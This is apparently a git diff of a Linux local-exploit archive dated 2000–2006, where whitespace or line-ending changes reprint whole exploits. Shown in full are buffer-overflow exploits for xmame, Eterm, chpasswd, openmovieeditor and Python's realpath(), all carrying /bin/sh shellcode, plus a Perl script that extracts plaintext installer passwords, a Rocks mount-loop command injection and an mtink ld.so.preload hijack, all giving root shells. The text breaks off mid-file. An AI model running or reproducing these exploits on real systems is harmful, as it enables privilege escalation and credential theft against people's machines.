./xmame-expl 1 \n"); -} - - -int main(int argc, char *argv[]) -{ - - int i, offset, input, size; - long esp, ret; - long *addr_ptr; - char *buf, *ptr, *f; - offset = 0; - esp = sp(); - ret = esp - offset; - - if(argc != 2) { - usage(); - return 1; - } - input=atoi(argv[1]); - switch(input) { - case 1: printf("Using -pb overflow method\n"); - size=1037; - f="-pb"; - break; - case 2: printf("Using -lang overflow method\n"); - size=1057; - f="-lang"; - break; - case 3: printf("Using -rec overflow method\n"); - size=1057; - f="-rec"; - break; - - default: usage(); - return 1; - } - buf=malloc(size); - ptr = buf; - addr_ptr = (long *) ptr; - for(i=0; i +#include + +char shellcode[]="\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d" + "\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58"; + +unsigned long sp(void) +{__asm__("movl %esp, %eax");} + +void usage() { + fprintf(stderr,"Usage: ./xmame-expl \n"); + fprintf(stderr,"buffers:\n -pb [1]"); + fprintf(stderr,"\n -lang [2]"); + fprintf(stderr,"\n -rec [3]"); + fprintf(stderr,"\nExample: ./xmame-expl 1 \n"); +} + + +int main(int argc, char *argv[]) +{ + + int i, offset, input, size; + long esp, ret; + long *addr_ptr; + char *buf, *ptr, *f; + offset = 0; + esp = sp(); + ret = esp - offset; + + if(argc != 2) { + usage(); + return 1; + } + input=atoi(argv[1]); + switch(input) { + case 1: printf("Using -pb overflow method\n"); + size=1037; + f="-pb"; + break; + case 2: printf("Using -lang overflow method\n"); + size=1057; + f="-lang"; + break; + case 3: printf("Using -rec overflow method\n"); + size=1057; + f="-rec"; + break; + + default: usage(); + return 1; + } + buf=malloc(size); + ptr = buf; + addr_ptr = (long *) ptr; + for(i=0; i -#include -#include -#include - -char shellcode[] = -/* Set gid */ - "\x90\x90\x90\x90\x90\x90\x90" -"\x31\xdb\x31\xc9\xbb\xff\xff\xff\xff\xb1\x2b\x31\xc0\xb0\x47\xcd\x80" -"\x31\xdb\x31\xc9\xb3\x2b\xb1\x2b\x31\xc0\xb0\x47\xcd\x80" - -/* 
execve() */ -"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" -"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" -"\x80\xe8\xdc\xff\xff\xff/bin/sh"; - - -unsigned long ret = 0xd096edb7; -unsigned long shell = 0xbfffebfd; - - - -int main(void) -{ - char *first, *last, *ptr; - char a[4], b[4]; - int slen = strlen(shellcode); - - if (!(first = (char *)malloc(4165))) - { - printf("%s:%d Could not allocate required memory\n", __FILE__, __LINE__); - exit(-1); - } - - - if (!(last = (char *)malloc(16))) - { - printf("%s:%d Could not allocate required memory\n", __FILE__, __LINE__); - exit(-1); - } - - if (!(ptr = (char *)malloc(4183))) - { - printf("%s:%d Could not allocate required memory\n", __FILE__, __LINE__); - exit(-1); - } - - strcpy(first, shellcode); - memset(first+slen, 'A', 4162-slen); - memset(last, 'A', 12); - first[4162] = '\0'; - last[12] = '\0'; - - a[0] = (ret >> 24) & 0xff; - a[1] = (ret >> 16) & 0xff; - a[2] = (ret >> 8) & 0xff; - a[3] = (ret) & 0xff; - - - b[0] = (shell >> 24) & 0xff; - b[1] = (shell >> 16) & 0xff; - b[2] = (shell >> 8) & 0xff; - b[3] = (shell) & 0xff; - - sprintf(ptr, "%s%c%c%c%c%s%c%c%c%c", first,a[0],a[1], a[2], a[3], last, - b[3],b[2],b[1],b[0]); - - - - execl("/usr/bin/Eterm", "eterm", "-X", ptr, NULL); - return 0; -} - -// milw0rm.com [2006-01-24] +// eterm by default isn't setuid but there is a lot of instances where +// it needs setuid root/utmp to run different options. /str0ke + +/*************************************************************************** + * Copyright ©Rosiello Security 2006 * + * * + * URL: http://www.rosiello.org * + * Author: Johnny Mast * + * e-mail: rave@rosiello.org * + * * + * This program is free software; you can redistribute it and/or modify * + * it under the terms of the GNU General Public License as published by * + * the Free Software Foundation; either version 2 of the License, or * + * (at your option) any later version. 
* + * * + * This program is distributed in the hope that it will be useful, * + * but WITHOUT ANY WARRANTY; without even the implied warranty of * + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * + * GNU General Public License for more details. * + * * + * You should have received a copy of the GNU General Public License * + * along with this program; if not, write to the * + * Free Software Foundation, Inc., * + * 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. * + ***************************************************************************/ + + //Exploit for Ubuntu with no randomized stack + +#include +#include +#include +#include + +char shellcode[] = +/* Set gid */ + "\x90\x90\x90\x90\x90\x90\x90" +"\x31\xdb\x31\xc9\xbb\xff\xff\xff\xff\xb1\x2b\x31\xc0\xb0\x47\xcd\x80" +"\x31\xdb\x31\xc9\xb3\x2b\xb1\x2b\x31\xc0\xb0\x47\xcd\x80" + +/* execve() */ +"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" +"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" +"\x80\xe8\xdc\xff\xff\xff/bin/sh"; + + +unsigned long ret = 0xd096edb7; +unsigned long shell = 0xbfffebfd; + + + +int main(void) +{ + char *first, *last, *ptr; + char a[4], b[4]; + int slen = strlen(shellcode); + + if (!(first = (char *)malloc(4165))) + { + printf("%s:%d Could not allocate required memory\n", __FILE__, __LINE__); + exit(-1); + } + + + if (!(last = (char *)malloc(16))) + { + printf("%s:%d Could not allocate required memory\n", __FILE__, __LINE__); + exit(-1); + } + + if (!(ptr = (char *)malloc(4183))) + { + printf("%s:%d Could not allocate required memory\n", __FILE__, __LINE__); + exit(-1); + } + + strcpy(first, shellcode); + memset(first+slen, 'A', 4162-slen); + memset(last, 'A', 12); + first[4162] = '\0'; + last[12] = '\0'; + + a[0] = (ret >> 24) & 0xff; + a[1] = (ret >> 16) & 0xff; + a[2] = (ret >> 8) & 0xff; + a[3] = (ret) & 0xff; + + + b[0] = (shell >> 24) & 0xff; + b[1] = (shell >> 16) & 0xff; + b[2] = (shell >> 8) & 0xff; + b[3] = 
(shell) & 0xff; + + sprintf(ptr, "%s%c%c%c%c%s%c%c%c%c", first,a[0],a[1], a[2], a[3], last, + b[3],b[2],b[1],b[0]); + + + + execl("/usr/bin/Eterm", "eterm", "-X", ptr, NULL); + return 0; +} + +// milw0rm.com [2006-01-24] diff --git a/platforms/linux/local/1449.c b/platforms/linux/local/1449.c index 4ad47e7da..f30c5f1ef 100755 --- a/platforms/linux/local/1449.c +++ b/platforms/linux/local/1449.c 
@@ -1,53 +1,53 @@ -/* -Change passwd 3.1 (SquirrelMail plugin ) - -Coded by rod hedor - -web-- http://lezr.com - -[local exploit] - - * Multiple buffer overflows are present in the handling of command line arguements in chpasswd. - The bug allows a hacker to exploit the process to run arbitrary code. -*/ - -#include -#include - -const char shellcode[]="\x90\x90\x90\x90\x90\x90\x90\x90" - "\x90\x90\x90\x90\x90\x90\x90\x90" - "\x90\x90\x90\x90\x90\x90\x90\x90" - "\x31\xc0\xb0\x17\x31\xdb\xcd\x80" - "\x89\xe5\x31\xc0\x50\x55\x89\xe5" - "\x50\x68\x6e\x2f\x73\x68\x68\x2f" - "\x2f\x62\x69\x89\xe3\x89\xe9\x89" - "\xea\xb0\x0b\xcd\x80"; - -long get_sp(){ - __asm__("movl %esp,%eax;"); -}; - -int main(){ - char buffer[1024]; - long stack = get_sp(); - int result = 1; - long offset = 0; - printf ("[!] Change_passwd v3.1(SquirrelMail plugin) exploit\n"); - printf ("[+] Current stack [0x%x]\n",stack); - while(offset <= 268435456){ - offset = offset + 1; - stack = get_sp() + offset; - memcpy(&buffer,"EGG=",4); - int a = 4; - while(a <= 108){ - memcpy(&buffer[a],"x",1); - a = a + 1;} - memcpy(&buffer[108],&stack,4); - memcpy(&buffer[112],&shellcode,sizeof(shellcode)); - putenv(buffer); - result = system("./chpasswd $EGG"); - if(result == 0){exit(0);}; - }; -}; - -// milw0rm.com [2006-01-25] +/* +Change passwd 3.1 (SquirrelMail plugin ) + +Coded by rod hedor + +web-- http://lezr.com + +[local exploit] + + * Multiple buffer overflows are present in the handling of command line arguements in chpasswd. + The bug allows a hacker to exploit the process to run arbitrary code. 
+*/ + +#include +#include + +const char shellcode[]="\x90\x90\x90\x90\x90\x90\x90\x90" + "\x90\x90\x90\x90\x90\x90\x90\x90" + "\x90\x90\x90\x90\x90\x90\x90\x90" + "\x31\xc0\xb0\x17\x31\xdb\xcd\x80" + "\x89\xe5\x31\xc0\x50\x55\x89\xe5" + "\x50\x68\x6e\x2f\x73\x68\x68\x2f" + "\x2f\x62\x69\x89\xe3\x89\xe9\x89" + "\xea\xb0\x0b\xcd\x80"; + +long get_sp(){ + __asm__("movl %esp,%eax;"); +}; + +int main(){ + char buffer[1024]; + long stack = get_sp(); + int result = 1; + long offset = 0; + printf ("[!] Change_passwd v3.1(SquirrelMail plugin) exploit\n"); + printf ("[+] Current stack [0x%x]\n",stack); + while(offset <= 268435456){ + offset = offset + 1; + stack = get_sp() + offset; + memcpy(&buffer,"EGG=",4); + int a = 4; + while(a <= 108){ + memcpy(&buffer[a],"x",1); + a = a + 1;} + memcpy(&buffer[108],&stack,4); + memcpy(&buffer[112],&shellcode,sizeof(shellcode)); + putenv(buffer); + result = system("./chpasswd $EGG"); + if(result == 0){exit(0);}; + }; +}; + +// milw0rm.com [2006-01-25] diff --git a/platforms/linux/local/1579.pl b/platforms/linux/local/1579.pl index 74c66e675..4622944e3 100755 --- a/platforms/linux/local/1579.pl +++ b/platforms/linux/local/1579.pl 
@@ -1,62 +1,62 @@ -#!/usr/bin/perl -w - -use warnings; -use strict; - -############################################################################## -# Author: Kristian Hermansen -# Date: 3/12/2006 -# Overview: Ubuntu Breezy stores the installation password in plain text -# Link: https://launchpad.net/distros/ubuntu/+source/shadow/+bug/34606 -############################################################################## - -print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"; -print "Kristian Hermansen's 'Eazy Breezy' Password Recovery Tool\n"; -print "99% effective, thank your local admin ;-)\n"; -print "FOR EDUCATIONAL PURPOSES ONLY!!!\n"; -print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n"; - -# the two vulnerable files -my $file1 = "/var/log/installer/cdebconf/questions.dat"; -my $file2 = "/var/log/debian-installer/cdebconf/questions.dat"; - -print "Checking if an exploitable file exists..."; -if ( (-e $file1) || (-e $file2) ) -{ - print "Yes\nNow checking if readable..."; - if ( -r $file1 ) - { - getinfo($file1); - } - else - { - if ( -r $file2 ) { - getinfo($file2); - } - else { - print "No\nAdmin may have changed the permissions on the files :-(\nExiting...\n"; - exit(-2); - } - } -} -else -{ - print "No\nFile may have been deleted by the administrator :-(\nExiting...\n"; - exit(-1); -} - -sub getinfo { - my $fn = shift; - print "Yes\nHere come the details...\n\n"; - my $realname = `grep -A 1 "Template: passwd/user-fullname" $fn | grep "Value: " | sed 's/Value: //'`; - my $user = `grep -A 1 "Template: passwd/username" $fn | grep "Value: " | sed 's/Value: //'`; - my $pass = `grep -A 1 "Template: passwd/user-password-again" $fn | grep "Value: " | sed 's/Value: //'`; - chomp($realname); - chomp($user); - chomp($pass); - print "Real Name: $realname\n"; - print "Username: $user\n"; - print "Password: $pass\n"; -} - -# milw0rm.com [2006-03-12] +#!/usr/bin/perl -w + +use warnings; +use strict; + 
+############################################################################## +# Author: Kristian Hermansen +# Date: 3/12/2006 +# Overview: Ubuntu Breezy stores the installation password in plain text +# Link: https://launchpad.net/distros/ubuntu/+source/shadow/+bug/34606 +############################################################################## + +print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"; +print "Kristian Hermansen's 'Eazy Breezy' Password Recovery Tool\n"; +print "99% effective, thank your local admin ;-)\n"; +print "FOR EDUCATIONAL PURPOSES ONLY!!!\n"; +print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n"; + +# the two vulnerable files +my $file1 = "/var/log/installer/cdebconf/questions.dat"; +my $file2 = "/var/log/debian-installer/cdebconf/questions.dat"; + +print "Checking if an exploitable file exists..."; +if ( (-e $file1) || (-e $file2) ) +{ + print "Yes\nNow checking if readable..."; + if ( -r $file1 ) + { + getinfo($file1); + } + else + { + if ( -r $file2 ) { + getinfo($file2); + } + else { + print "No\nAdmin may have changed the permissions on the files :-(\nExiting...\n"; + exit(-2); + } + } +} +else +{ + print "No\nFile may have been deleted by the administrator :-(\nExiting...\n"; + exit(-1); +} + +sub getinfo { + my $fn = shift; + print "Yes\nHere come the details...\n\n"; + my $realname = `grep -A 1 "Template: passwd/user-fullname" $fn | grep "Value: " | sed 's/Value: //'`; + my $user = `grep -A 1 "Template: passwd/username" $fn | grep "Value: " | sed 's/Value: //'`; + my $pass = `grep -A 1 "Template: passwd/user-password-again" $fn | grep "Value: " | sed 's/Value: //'`; + chomp($realname); + chomp($user); + chomp($pass); + print "Real Name: $realname\n"; + print "Username: $user\n"; + print "Password: $pass\n"; +} + +# milw0rm.com [2006-03-12] diff --git a/platforms/linux/local/1591.py b/platforms/linux/local/1591.py index 9a38a5eee..a58d58d31 100755 --- a/platforms/linux/local/1591.py 
+++ b/platforms/linux/local/1591.py 
@@ -1,47 +1,47 @@ -#!/usr/bin/python - -# gexp-python.py -# -# Python <= 2.4.2 realpath() Local Stack Overflow -# ----------------------------------------------- -# Against VA Space Randomization. -# -# Copyright (c) 2006 Gotfault Security -# -# Bug found and developed by: dx/vaxen (Gotfault Security), -# posidron (Tripbit Research Group). -# Enviroment: -# -# Kernel Version : 2.6.12.5-vs2.0 -# GCC Version : 4.0.3 -# Libc Version : 2.3.5 -# -# Special greets goes to : posidron from tripbit.net -# RFDSLabs, barros, izik, -# Gotfault Security Community. -# -# Original Reference: -# http://gotfault.net/research/exploit/gexp-python.py - -import os - -# JMP *%ESP @ linux-gate.so.1 -jmp = "\x5f\xe7\xff\xff" - -shell = "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e" -shell += "\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3" -shell += "\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1" -shell += "\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" - -os.chdir("/tmp") -base = os.getcwd() -dir = os.path.join("A"*250, "A"*250, "A"*250, "A"*250, "A"*42, jmp+shell) -os.makedirs(dir) -os.chdir(dir) - -os.system('> vuln.py; python vuln.py') -os.remove("vuln.py") -os.chdir(base) -os.removedirs(dir) - -# milw0rm.com [2006-03-18] +#!/usr/bin/python + +# gexp-python.py +# +# Python <= 2.4.2 realpath() Local Stack Overflow +# ----------------------------------------------- +# Against VA Space Randomization. +# +# Copyright (c) 2006 Gotfault Security +# +# Bug found and developed by: dx/vaxen (Gotfault Security), +# posidron (Tripbit Research Group). +# Enviroment: +# +# Kernel Version : 2.6.12.5-vs2.0 +# GCC Version : 4.0.3 +# Libc Version : 2.3.5 +# +# Special greets goes to : posidron from tripbit.net +# RFDSLabs, barros, izik, +# Gotfault Security Community. 
+# +# Original Reference: +# http://gotfault.net/research/exploit/gexp-python.py + +import os + +# JMP *%ESP @ linux-gate.so.1 +jmp = "\x5f\xe7\xff\xff" + +shell = "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e" +shell += "\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3" +shell += "\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1" +shell += "\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + +os.chdir("/tmp") +base = os.getcwd() +dir = os.path.join("A"*250, "A"*250, "A"*250, "A"*250, "A"*42, jmp+shell) +os.makedirs(dir) +os.chdir(dir) + +os.system('> vuln.py; python vuln.py') +os.remove("vuln.py") +os.chdir(base) +os.removedirs(dir) + +# milw0rm.com [2006-03-18] diff --git a/platforms/linux/local/178.c b/platforms/linux/local/178.c index c1da6059a..024b1ef1f 100755 --- a/platforms/linux/local/178.c +++ b/platforms/linux/local/178.c @@ -132,6 +132,6 @@ int main() return( -1 ); } - - -// milw0rm.com [2000-11-15] + + +// milw0rm.com [2000-11-15] diff --git a/platforms/linux/local/180.c b/platforms/linux/local/180.c index 203aa68f3..3dcd7a2fd 100755 --- a/platforms/linux/local/180.c +++ b/platforms/linux/local/180.c @@ -50,6 +50,6 @@ int main(int argc,char **argv){ printf("*** execution of %s failed. (check the path)\n",PATH); exit(-1); } -} - -// milw0rm.com [2000-11-15] +} + +// milw0rm.com [2000-11-15] diff --git a/platforms/linux/local/182.sh b/platforms/linux/local/182.sh index 12011863c..ce99a13af 100755 --- a/platforms/linux/local/182.sh +++ b/platforms/linux/local/182.sh @@ -16,7 +16,7 @@ # # Please do NOT remove this header from the file. # - + echo "###########################################" echo "# /sbin/restore exploit for rh6.2 #" echo "# this file by nawok '00 #" @@ -36,6 +36,6 @@ echo "==> DONE! If everything went OK we will now enter rootshell..." echo "==> To check if its rooted, type 'whoami', or 'id'" echo "==> B-Bye, you are on your own now." /home/$USER/sh - - -# milw0rm.com [2000-11-16] + + +# milw0rm.com [2000-11-16] 
diff --git a/platforms/linux/local/183.c b/platforms/linux/local/183.c index 2e28b8980..ea9582077 100755 --- a/platforms/linux/local/183.c +++ b/platforms/linux/local/183.c @@ -57,6 +57,6 @@ void main(int argc, char *argv[]) { sprintf(binary,"%s/bin/oidldapd connect=$EGG",ORACLE_HOME); system(binary); } - - -// milw0rm.com [2000-11-16] + + +// milw0rm.com [2000-11-16] diff --git a/platforms/linux/local/184.pl b/platforms/linux/local/184.pl index 28b99a10c..7b13f7d55 100755 --- a/platforms/linux/local/184.pl +++ b/platforms/linux/local/184.pl @@ -139,6 +139,6 @@ else { USAGE ; } - - -# milw0rm.com [2000-11-16] + + +# milw0rm.com [2000-11-16] diff --git a/platforms/linux/local/186.pl b/platforms/linux/local/186.pl index 259addb14..e252eee46 100755 --- a/platforms/linux/local/186.pl +++ b/platforms/linux/local/186.pl @@ -47,6 +47,6 @@ int main(int argc,char **argv){ exit(0); } } - - -# milw0rm.com [2000-11-17] + + +# milw0rm.com [2000-11-17] diff --git a/platforms/linux/local/193.sh b/platforms/linux/local/193.sh index 116dacae8..35ceab4c2 100755 --- a/platforms/linux/local/193.sh +++ b/platforms/linux/local/193.sh @@ -31,6 +31,6 @@ echo "Waiting for rootshell .... 5 seconds...." sleep 5 /tmp/sush id - - -# milw0rm.com [2000-11-19] + + +# milw0rm.com [2000-11-19] diff --git a/platforms/linux/local/2016.sh b/platforms/linux/local/2016.sh index b1cbd761a..01076106b 100755 --- a/platforms/linux/local/2016.sh +++ b/platforms/linux/local/2016.sh 
@@ -1,12 +1,12 @@ -#!/bin/sh -############################################################################## -## rocksmountdirty.sh: Rocks release <=4.1 local root exploit -## make sure 'mount-loop' is in your path for this to work. -## -## coded by: xavier@tigerteam.se [http://xavsec.blogspot.com] -############################################################################## -echo "Rocks Clusters <=4.1 mount-loop local root exploit by xavier@tigerteam.se [http://xavsec.blogspot.com]" -echo "getting root.. goodluck" -mount-loop "null" "null" "null; python -c 'import os;os.setuid(0);os.setgid(0);os.execl(\"/bin/sh\", \"/usr/sbin/httpd\")'" - -# milw0rm.com [2006-07-15] +#!/bin/sh +############################################################################## +## rocksmountdirty.sh: Rocks release <=4.1 local root exploit +## make sure 'mount-loop' is in your path for this to work. +## +## coded by: xavier@tigerteam.se [http://xavsec.blogspot.com] +############################################################################## +echo "Rocks Clusters <=4.1 mount-loop local root exploit by xavier@tigerteam.se [http://xavsec.blogspot.com]" +echo "getting root.. goodluck" +mount-loop "null" "null" "null; python -c 'import os;os.setuid(0);os.setgid(0);os.execl(\"/bin/sh\", \"/usr/sbin/httpd\")'" + +# milw0rm.com [2006-07-15] diff --git a/platforms/linux/local/203.sh b/platforms/linux/local/203.sh index 16b55bb68..07afcc6a7 100755 --- a/platforms/linux/local/203.sh +++ b/platforms/linux/local/203.sh @@ -201,6 +201,6 @@ while :; do echo exit 1 done - - -# milw0rm.com [2000-11-21] + + +# milw0rm.com [2000-11-21] diff --git a/platforms/linux/local/206.c b/platforms/linux/local/206.c index 3fbedae69..c5d7089c8 100755 --- a/platforms/linux/local/206.c +++ b/platforms/linux/local/206.c @@ -117,6 +117,6 @@ int main(int argc, char *argv[], char *envp[]) exit(0); } - - -// milw0rm.com [2000-11-29] + + +// milw0rm.com [2000-11-29] 
diff --git a/platforms/linux/local/209.c b/platforms/linux/local/209.c index 27be32d50..f0b82c661 100755 --- a/platforms/linux/local/209.c +++ b/platforms/linux/local/209.c @@ -603,6 +603,6 @@ dentry->d_name); printf("failed to find a valid language\naborting\n"); exit(0); } - - -// milw0rm.com [2000-11-30] + + +// milw0rm.com [2000-11-30] diff --git a/platforms/linux/local/2144.sh b/platforms/linux/local/2144.sh index a2153fed9..2e7e42c22 100755 --- a/platforms/linux/local/2144.sh +++ b/platforms/linux/local/2144.sh @@ -1,26 +1,26 @@ -#!/bin/sh -echo -echo "mtink libXm local root exploit" -echo "* karol@wiesek.pl *" -echo -umask 000 -export DEBUG_FILE="/etc/ld.so.preload" -cat > /tmp/lib.c << _EOF -#include -void _init(void) -{ - if (getuid()!=0 && geteuid()==0) - { - setuid(0); - unlink("/etc/ld.so.preload"); - execl("/bin/bash", "bash", 0); - } -} -_EOF -/usr/bin/gcc -o /tmp/lib.o -c /tmp/lib.c -/usr/bin/ld -shared -o /tmp/lib.so /tmp/lib.o -/usr/bin/mtink -echo "/tmp/lib.so" > /etc/ld.so.preload -/bin/ping - -# milw0rm.com [2006-08-08] +#!/bin/sh +echo +echo "mtink libXm local root exploit" +echo "* karol@wiesek.pl *" +echo +umask 000 +export DEBUG_FILE="/etc/ld.so.preload" +cat > /tmp/lib.c << _EOF +#include +void _init(void) +{ + if (getuid()!=0 && geteuid()==0) + { + setuid(0); + unlink("/etc/ld.so.preload"); + execl("/bin/bash", "bash", 0); + } +} +_EOF +/usr/bin/gcc -o /tmp/lib.o -c /tmp/lib.c +/usr/bin/ld -shared -o /tmp/lib.so /tmp/lib.o +/usr/bin/mtink +echo "/tmp/lib.so" > /etc/ld.so.preload +/bin/ping + +# milw0rm.com [2006-08-08] diff --git a/platforms/linux/local/215.c b/platforms/linux/local/215.c index 961adfc1e..a4bcbb767 100755 --- a/platforms/linux/local/215.c +++ b/platforms/linux/local/215.c @@ -164,6 +164,6 @@ int main(int argc, char** argv) { execle(xpath, "mount", numbuf, 0, envbuf); } - - -// milw0rm.com [2000-12-02] + + +// milw0rm.com [2000-12-02] 
diff --git a/platforms/linux/local/217.c b/platforms/linux/local/217.c index bb7b89b56..d535960f6 100755 --- a/platforms/linux/local/217.c +++ b/platforms/linux/local/217.c @@ -93,6 +93,6 @@ main() printf("* my work here is done.\n\n"); printf("now pray for some kinda of crash.\n\n\t--zen\n"); } - - -// milw0rm.com [2000-12-04] + + +// milw0rm.com [2000-12-04] diff --git a/platforms/linux/local/218.c b/platforms/linux/local/218.c index 98486a7dc..28e93b2a0 100755 --- a/platforms/linux/local/218.c +++ b/platforms/linux/local/218.c @@ -102,6 +102,6 @@ int main(int argc, char *argv[]) { setenv("HOME", buf, 1); system(EXPECT); } - - -// milw0rm.com [2000-12-04] + + +// milw0rm.com [2000-12-04] diff --git a/platforms/linux/local/219.c b/platforms/linux/local/219.c index b1d992903..73598323d 100755 --- a/platforms/linux/local/219.c +++ b/platforms/linux/local/219.c @@ -100,6 +100,6 @@ main(int argc, char **argv){ fprintf(stderr, "Ret-addr %#x, offset: %d, allign: %d.\n",address, offset, allign); execlp("/usr/lib/games/gnomehack/gnomehack", "gnomehack", 0); //Mod path if needed. } - - -// milw0rm.com [2000-12-04] + + +// milw0rm.com [2000-12-04] diff --git a/platforms/linux/local/2193.php b/platforms/linux/local/2193.php index b645aa604..ad91bbd38 100755 --- a/platforms/linux/local/2193.php +++ b/platforms/linux/local/2193.php @@ -1,137 +1,137 @@ - - -# milw0rm.com [2006-08-16] + + +# milw0rm.com [2006-08-16] diff --git a/platforms/linux/local/221.c b/platforms/linux/local/221.c index 31b85cede..ea535cd03 100755 --- a/platforms/linux/local/221.c +++ b/platforms/linux/local/221.c @@ -85,6 +85,6 @@ main(int argc, char **argv){ fprintf(stderr, "Ret-addr %#x, offset: %d, allign: %d.\n",address,offset,allign); execlp("/opt/kde/bin/kwintv", "kwintv", 0);//Change path if needed. :D } - - -// milw0rm.com [2000-12-06] + + +// milw0rm.com [2000-12-06] diff --git a/platforms/linux/local/222.c b/platforms/linux/local/222.c index f26f4ac68..cba6a251c 100755 
--- a/platforms/linux/local/222.c +++ b/platforms/linux/local/222.c @@ -44,6 +44,6 @@ main(int argc, char **argv){ fprintf(stderr,"Return address %#x, offset: %d.\n",address,offset); execlp("/opt/gnome/bin/gnome_segv","gnome_segv",0); } - - -// milw0rm.com [2000-12-06] + + +// milw0rm.com [2000-12-06] diff --git a/platforms/linux/local/229.c b/platforms/linux/local/229.c index 094d81b6b..740ebad55 100755 --- a/platforms/linux/local/229.c +++ b/platforms/linux/local/229.c @@ -43,6 +43,6 @@ main (int argc, char *argv[]) fprintf(stderr, "[return address = %x] [offset = %d] [buffer size = %d]\n", ret + offset, offset, BUFSIZE); execl ("./xsoldier", "xsoldier", "-display", buffer, 0); } - - -// milw0rm.com [2000-12-15] + + +// milw0rm.com [2000-12-15] diff --git a/platforms/linux/local/231.sh b/platforms/linux/local/231.sh index 311fcc8d1..2c0ddaaec 100755 --- a/platforms/linux/local/231.sh +++ b/platforms/linux/local/231.sh @@ -43,6 +43,6 @@ chmod 777 $PICO_FILE echo "Get the message from "$PICO_FILE echo "^C to break tailer" tail -f $PICO_FILE - - -# milw0rm.com [2000-12-15] + + +# milw0rm.com [2000-12-15] diff --git a/platforms/linux/local/2338.c b/platforms/linux/local/2338.c index 129041ce0..14fca3e52 100755 --- a/platforms/linux/local/2338.c +++ b/platforms/linux/local/2338.c 
@@ -1,125 +1,125 @@ -/* - * openmovieeditor buffer overflow exploit - * by qnix < qnix[at]bsdmail[dot]org - * - * Dont forget to change the return address (RETADDR) - * - * - * -------------------------- - * devil: ~ \> envt/envt -s 2 - * Shellcode: linux/x86 setuid(0),setgid(0) execve(/bin/sh, [/bin/sh, NULL]) 37 bytes - * [+] Setting memory for the shellcode. - * [+] Copying shellcode to memory. - * [+] Putting shellcode in the environment. - * [+] Going into the environment (ENVT) and exiting .... - * Done 37 bytes loaded to (ENVT) - * devil: ~ \> envt/envt - * SHELLCODE FOUND IN 0xbffffbf5 - * devil: ~ \> ./ome_buf - * - * ***************************************** - * openmovieeditor buffer overflow exploit - * by qnix < qnix[at]bsdmail[dot]org - * Dont forget to change the return address - * ***************************************** - * - * Usage : ./ome_buf - * devil: ~ \> ./ome_buf Video\ Projects/exploit.vproj /usr/local/bin/openmovieeditor - * - * [+] Video Projects/exploit.vproj Created|Opened - * [~] Desired Return Addr : 0xbffffbf5 - * [~] Offset from ESP : 0x0 - * [+] Executing openmovieeditor - * - * sh-3.1# whoami;id - * root - * uid=0(root) gid=0(root) groups=0(root) - * sh-3.1# exit - * exit - * - * -------------------------- - * - * */ - -#include -#include - -#define RETADDR '\xbf\xff\xfb\xf5' -#define SLEEP sleep(1); - -int main(int argc,char *argv[]) { - FILE *output; - - int i, offset; - long ret, *addr_ptr; - char *buffer, *ptr; - - offset = 0; - ret = RETADDR - offset; - - if(argc != 3) { - fprintf(stderr,"\n*****************************************\n"); - fprintf(stderr,"openmovieeditor buffer overflow exploit\n"); - fprintf(stderr,"by qnix < qnix[at]bsdmail[dot]org\n"); - fprintf(stderr,"Dont forget to change the return address\n"); - fprintf(stderr,"*****************************************\n\n"); - - fprintf(stderr,"Usage : %s \n",argv[0]); - return 0; - } - - output = fopen(argv[1],"w+"); - - if(output == 0) { - fprintf(stderr,"\n[-] 
Cannot create %s\n",argv[1]); - SLEEP - return 0; - } else { - fprintf(stdout,"\n[+] %s Created|Opened\n",argv[1]); - SLEEP - } - - fprintf(output,"\n"); - fprintf(output,"\n"); - fprintf(output," 0.0.20060901\n"); - - /* evil code ^_^ */ - buffer = malloc(2300); - ptr = buffer; - addr_ptr = (long *) ptr; - for(i=0; i < 2300; i+=4) - { *(addr_ptr++) = ret; } - for(i=0; i < 1040; i++) - { buffer[i] = '\x90'; } - ptr = buffer + 1044; - buffer[2300-1] = 0; - - fprintf(output," %s\n",buffer); - fprintf(output," \n"); - fprintf(output," \n"); - fprintf(output," \n"); - fprintf(output," \n"); - fprintf(output," \n"); - fprintf(output," \n"); - fprintf(output," \n"); - fprintf(output," \n"); - fprintf(output," \n"); - fprintf(output," \n"); - fprintf(output," \n"); - fprintf(output,"\n"); - - fprintf(stdout,"[~] Desired Return Addr : 0x%x\n", ret); - SLEEP - fprintf(stdout,"[~] Offset from ESP : 0x%x\n", offset); - SLEEP - - fprintf(stdout,"[+] Executing openmovieeditor\n\n"); - fclose(output); - SLEEP - - execl(argv[2],"openmovieeditor",0); - - return 0; -} - -// milw0rm.com [2006-09-09] +/* + * openmovieeditor buffer overflow exploit + * by qnix < qnix[at]bsdmail[dot]org + * + * Dont forget to change the return address (RETADDR) + * + * + * -------------------------- + * devil: ~ \> envt/envt -s 2 + * Shellcode: linux/x86 setuid(0),setgid(0) execve(/bin/sh, [/bin/sh, NULL]) 37 bytes + * [+] Setting memory for the shellcode. + * [+] Copying shellcode to 